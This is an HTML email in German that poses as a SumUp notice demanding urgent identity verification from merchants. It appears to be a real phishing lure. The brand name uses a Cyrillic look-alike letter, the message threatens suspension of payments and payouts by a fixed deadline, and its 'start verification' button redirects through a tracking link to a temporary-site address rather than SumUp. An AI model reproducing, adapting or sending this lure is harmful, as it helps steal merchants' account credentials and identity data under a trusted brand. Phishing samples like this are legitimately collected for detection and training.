<!DOCTYPE html>
<html lang="de">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Wichtige Konto-Verifizierung erforderlich | SumUр</title>
    <style>
        /* Reset and Base Styles */
        body, html {
            margin: 0;
            padding: 0;
            font-family: 'Helvetica Neue', Arial, sans-serif;
            line-height: 1.5;
            color: #333333;
            background-color: #f8f9fa;
        }
        
        /* Email Container */
        .email-container {
            max-width: 600px;
            margin: 0 auto;
            background-color: #ffffff;
            border-radius: 8px;
            overflow: hidden;
            box-shadow: 0 2px 10px rgba(0, 0, 0, 0.05);
        }
        
        /* Header */
        .email-header {
            padding: 25px 30px 15px;
            text-align: center;
            border-bottom: 1px solid #eaeaea;
            background-color: #ffffff;
        }
        
        .logo {
            max-width: 140px;
            height: auto;
        }
        
        .email-title {
            font-size: 24px;
            font-weight: 700;
            color: #1a1a1a;
            margin: 15px 0 5px;
        }
        
        .email-subtitle {
            font-size: 16px;
            color: #666666;
            margin-bottom: 10px;
        }
        
        /* Priority Banner */
        .priority-banner {
            background: linear-gradient(135deg, #1a3bc8 0%, #2e55e8 100%);
            color: #ffffff;
            padding: 18px 30px;
            text-align: center;
            font-weight: 700;
            font-size: 17px;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        
        .priority-banner svg {
            margin-right: 10px;
            width: 20px;
            height: 20px;
            fill: currentColor;
        }
        
        /* Content */
        .email-content {
            padding: 30px;
        }
        
        .greeting {
            font-size: 16px;
            margin-bottom: 20px;
        }
        
        /* Status Caгd (Used for visual urgency/status) */
        .status-caгd {
            background-color: #f0f5ff;
            border-radius: 6px;
            padding: 18px;
            margin: 20px 0;
            display: flex;
            align-items: center;
            border-left: 4px solid #2e55e8;
        }
        
        .status-icon {
            margin-right: 15px;
            width: 24px;
            height: 24px;
            display: flex;
            align-items: center;
            justify-content: center;
        }
        
        .status-details strong {
            display: block;
            margin-bottom: 5px;
            font-size: 16px;
        }
        
        .deadline {
            color: #c0392b;
            font-weight: 700;
            font-size: 15px;
        }
        
        /* Action Required (Warning Block) */
        .action-required {
            background-color: #fff8e6;
            border: 1px solid #ffd54f;
            border-radius: 6px;
            padding: 20px;
            margin: 25px 0;
        }
        
        .action-required h3 {
            margin-top: 0;
            color: #e67e22;
            font-size: 17px;
            font-weight: 700;
            display: flex;
            align-items: center;
        }
        
        .action-required h3 svg {
            margin-right: 8px;
            width: 18px;
            height: 18px;
            fill: currentColor;
        }
        
        .action-required ul {
            margin: 10px 0 0;
            padding-left: 20px;
        }
        
        .action-required li {
            margin-bottom: 7px;
            color: #555555;
        }

        .action-required p {
            margin-bottom: 5px;
        }
        
        .cta-container {
            text-align: center;
            margin: 30px 0;
        }
        
        .cta-button {
            display: inline-block;
            background: linear-gradient(135deg, #2e55e8 0%, #1a3bc8 100%);
            color: #ffffff !important;
            text-decoration: none;
            padding: 14px 32px;
            border-radius: 6px;
            font-weight: 600;
            font-size: 17px;
            box-shadow: 0 2px 5px rgba(46, 85, 232, 0.3);
            transition: all 0.2s ease;
        }
        
        .cta-button:hover {
            background: linear-gradient(135deg, #1a3bc8 0%, #1531a3 100%);
            box-shadow: 0 3px 8px rgba(46, 85, 232, 0.4);
            transform: translateY(-1px);
        }
        
        .benefits-section {
            margin-top: 35px;
            padding-top: 20px;
            border-top: 1px solid #f0f0f0;
        }
        
        .benefits-section h3 {
            font-size: 18px;
            margin-bottom: 20px;
            color: #1a1a1a;
            font-weight: 600;
        }
        
        .benefit-item {
            display: flex;
            margin-bottom: 20px;
            align-items: flex-start;
        }
        
        .benefit-icon {
            margin-right: 15px;
            color: #2e55e8;
            font-size: 18px;
            min-width: 24px;
            display: flex;
            align-items: center;
            justify-content: center;
            width: 24px;
            height: 24px;
        }
        
        .benefit-content h4 {
            margin: 0 0 5px;
            font-size: 16px;
            font-weight: 700;
            color: #1a1a1a;
        }
        
        .benefit-content p {
            margin: 0;
            color: #666666;
            font-size: 14px;
        }
        
        /* Footer */
        .email-footer {
            background-color: #f8f9fa;
            padding: 25px 30px;
            border-top: 1px solid #eaeaea;
            font-size: 13px;
            color: #666666;
            line-height: 1.5;
        }

        .footer-note {
            margin-bottom: 20px;
            color: #333333;
            font-size: 12px;
            line-height: 1.6;
            border-bottom: 1px solid #f0f0f0;
            padding-bottom: 15px;
        }
        
        .company-info {
            margin-bottom: 15px;
        }
        
        .legal-disclaimer {
            font-size: 11px;
            color: #888888;
            line-height: 1.4;
            margin-top: 20px;
            padding-top: 15px;
            border-top: 1px solid #eaeaea;
        }
        
        .footer-links {
            margin-top: 15px;
        }
        
        .footer-links a {
            color: #666666;
            text-decoration: none;
            margin-right: 15px;
            font-size: 12px;
        }
        
        .footer-links a:hover {
            text-decoration: underline;
        }
        
        /* Responsive */
        @media (max-width: 480px) {
            .email-content, .email-footer {
                padding: 20px;
            }
            
            .email-header {
                padding: 20px 20px 10px;
            }
            
            .priority-banner {
                padding: 15px 20px;
            }
            
            .status-caгd {
                flex-direction: column;
                align-items: flex-start;
            }
            
            .status-icon {
                margin-bottom: 10px;
            }
            
            .cta-button {
                padding: 12px 25px;
                font-size: 16px;
            }
        }
    </style>
</head>
<body>
    <div class="email-container">
        <div class="email-header">
            <img src="https://image.crm.sumup.com/lib/fe5f15707c6201797016/m/5/3c2f852f-0740-4ba9-a523-69bf2c7d22a4.png" alt="SumUр Logo" class="logo">
            <h1 class="email-title">Wichtige Konto-Verifizierung</h1>
            <p class="email-subtitle">Aktualisierung Ihrer Daten zur Einhaltung regulatorischer Standards</p>
        </div>
        
        <div class="priority-banner">
            <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 15h-2v-6h2v6zm0-8h-2V7h2v2z"/>
            </svg>
            Handeln Sie jetzt: Nur noch 2 Tage bis zur Frist (28. November 2025)
        </div>
        
        <div class="email-content">
            <p class="greeting">Sehr geehrte/r Händler/in,</p>
            
            <p>Vielen Dank, dass Sie SumUр nutzen. Zur Gewährleistung der <strong>Sicherheit</strong> Ihres Kontos und zur <strong>Einhaltung unserer regulatorischen Standards</strong> ist eine einmalige Aktualisierung und Verifizierung Ihrer Identitätsdaten erforderlich. Dies ist ein verpflichtender Prozess für alle Finanzdienstleister.</p>
            
            <div class="status-caгd">
                <div class="status-icon">
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="#2e55e8">
                        <path d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm-2 15l-5-5 1.41-1.41L10 14.17l7.59-7.59L19 8l-9 9z"/>
                    </svg>
                </div>
                <div class="status-details">
                    <strong>Status: Ausstehend – Verifizierung dringend erforderlich</strong>
                    <span class="deadline">Frist: 28. November 2025</span>
                </div>
            </div>
            
            <div class="action-required">
                <h3>
                    <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24">
                        <path d="M1 21h22L12 2 1 21zm12-3h-2v-2h2v2zm0-4h-2v-4h2v4z"/>
                    </svg>
                    Wichtige Konsequenzen bei Verzögerung
                </h3>
                <p>Wird die vollständige Verifizierung **nicht bis zum 28. November 2025** abgeschlossen, sind wir verpflichtet, folgende Funktionen **vollständig auszusetzen**:</p>
                <ul>
                    <li>Empfang von Zahlungen (Transaktionen mit Lesegerät/Online-Shops)</li>
                    <li>Auszahlungen Ihrer Einnahmen auf Ihr Bankkonto</li>
                    <li>Zugriff auf bestimmte Kontofunktionen (z.B. SumUр Caгd)</li>
                </ul>
            </div>
            
            <div class="cta-container">
                <a href="https://trackingservice.monday.com/tracker/link?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJvcmlnaW5hbFVybCI6Imh0dHBzOi8vc3VtdXAuZnluLnpveS50ZW1wb3Jhcnkuc2l0ZS9hbmlzZGUiLCJlbWFpbElkIjoiZGFmMWQxNjktOWU3Zi00NmVhLTkyYTUtYjVhMjQ2NzA0MDk5IiwiaWF0IjoxNzY0MTM0ODk1fQ.dSrX-Z7PVFAbkOXqLfbpWX_L6sdylIISxW-zfNP1eRY&r=euc1" class="cta-button">Jetzt Verifizierung starten (In 3 Minuten erledigt)</a>
            </div>
            
            <p style="text-align: center; color: #666; font-size: 14px;">Bitte verwenden Sie den Link oben oder loggen Sie sich direkt in Ihr SumUр-Dashboard ein, um den Vorgang abzuschließen.</p>

            <div class="benefits-section">
                <h3>Ihre Vorteile nach erfolgreicher Verifizierung:</h3>
                
                <div class="benefit-item">
                    <div class="benefit-icon">
                        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="#2e55e8">
                            <path d="M12 1L3 5v6c0 5.55 3.84 10.74 9 12 5.16-1.26 9-6.45 9-12V5l-9-4zm0 10.99h7c-.53 4.12-3.28 7.79-7 8.94V12H5V6.3l7-3.11v8.8z"/>
                        </svg>
                    </div>
                    <div class="benefit-content">
                        <h4>Garantierte Compliance</h4>
                        <p>Sicherung der Einhaltung aller EU-weiten Richtlinien und Finanzvorschriften.</p>
                    </div>
                </div>
                
                <div class="benefit-item">
                    <div class="benefit-icon">
                        <svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="#2e55e8">
                            <path d="M9 17l3-2.94c-.39-.04-.68-.06-1-.06-2.67 0-8 1.34-8 4v2h9l-3-3zm2-5c2.21 0 4-1.79 4-4s-1.79-4-4-4-4 1.79-4 4 1.79 4 4 4m4.47 8.5L12 17l1.4-1.41 2.07 2.08 5.13-5.17 1.4 1.41-6.53 6.59z"/>
                        </svg>
                    </div>
                    <div class="benefit-content">
                        <h4>Ungehinderte Transaktionen</h4>
                        <p>Volle Nutzung aller Zahlungsfunktionen ohne Unterbrechung oder Einschränkungen.</p>
                    </div>
                </div>
                
            </div>
        </div>
        
        <div class="email-footer">
            
            <div class="legal-disclaimer">
                SumUр Payments Limited ist im Vereinigten Königreich von der Financial Conduct Authority gemäß den Electronic Money Regulations 2011 (Registernummer 900700) zugelassen.
            </div>
            
            <div class="footer-links">
                
            </div>
        </div>
    </div>
</body>
</html>